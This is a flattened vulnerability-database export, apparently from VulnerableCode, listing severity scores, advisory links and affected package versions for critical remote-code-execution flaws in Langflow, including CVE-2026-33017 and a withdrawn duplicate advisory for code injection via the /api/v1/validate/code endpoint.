scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/
url https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0
3
reference_url https://github.com/langflow-ai/langflow/issues/12345
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/issues/12345
4
reference_url https://github.com/langflow-ai/langflow/pull/12160
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/12160
5
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.8.2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.8.2
6
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx
7
reference_url https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33017
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33017
9
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017
10
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017
11
reference_url https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
12
reference_url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
reference_id GHSA-rvqx-wpfh-mfx7
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/
url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
13
reference_url https://github.com/advisories/GHSA-vwmf-pq79-vjvx
reference_id GHSA-vwmf-pq79-vjvx
reference_type
scores
url https://github.com/advisories/GHSA-vwmf-pq79-vjvx
fixed_packages
aliases CVE-2026-33017, GHSA-vwmf-pq79-vjvx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqwj-45w7-7kft
21
url VCID-ztx2-wefa-c7bk
vulnerability_id VCID-ztx2-wefa-c7bk
summary
Duplicate Advisory: Langflow Vulnerable to Code Injection via the `/api/v1/validate/code` endpoint
### Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rvqx-wpfh-mfx7. This link is maintained to preserve external references.

### Original Description

Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
references
0
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
1
reference_url https://github.com/langflow-ai/langflow/pull/6911
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/6911
2
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
3
reference_url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
reference_id CVE-2025-3248
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
5
reference_url https://github.com/advisories/GHSA-c995-4fw3-j39m
reference_id GHSA-c995-4fw3-j39m
reference_type
scores
url https://github.com/advisories/GHSA-c995-4fw3-j39m
fixed_packages
0
url pkg:pypi/langflow@1.3.0
purl pkg:pypi/langflow@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-fc5h-qc2t-xqc3
7
vulnerability VCID-ncvf-vzqr-uydz
8
vulnerability VCID-q4r1-xjfk-7bg9
9
vulnerability VCID-qwtw-q92t-quhz
10
vulnerability VCID-rc54-gw71-gyau
11
vulnerability VCID-rrva-95s5-kbcf
12
vulnerability VCID-sbea-kkfu-akgb
13
vulnerability VCID-u8mw-7znw-rfab
14
vulnerability VCID-v5pc-pdm9-97g8
15
vulnerability VCID-ypxh-x2hy-3uhb
16
vulnerability VCID-ysnc-jyxb-6qcy
17
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0
aliases GHSA-c995-4fw3-j39m
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ztx2-wefa-c7bk
Fixing_vulnerabilities
Risk_score 10.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@0.5.0a0